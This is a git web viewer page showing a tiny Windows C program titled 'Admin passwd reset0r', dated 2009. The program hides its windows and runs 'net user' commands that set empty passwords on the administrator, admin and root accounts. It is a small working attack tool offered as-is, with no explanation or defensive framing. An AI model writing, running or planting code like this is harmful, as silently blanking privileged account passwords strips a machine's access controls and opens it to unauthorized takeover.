docs
[mirrors/Programs.git] / c / adminpass / adminpass.c
1 /*
2 Admin passwd reset0r
3 Harvie 2oo9
4 */
5
6 #include <windows.h>
7
8 int main() {
9 WinExec("net user administrator \"\"",SW_HIDE);
10 WinExec("net user admin \"\"",SW_HIDE);
11 WinExec("net user root \"\"",SW_HIDE);
12 return 0;
13 }
This page took 0.361307 seconds and 4 git commands to generate.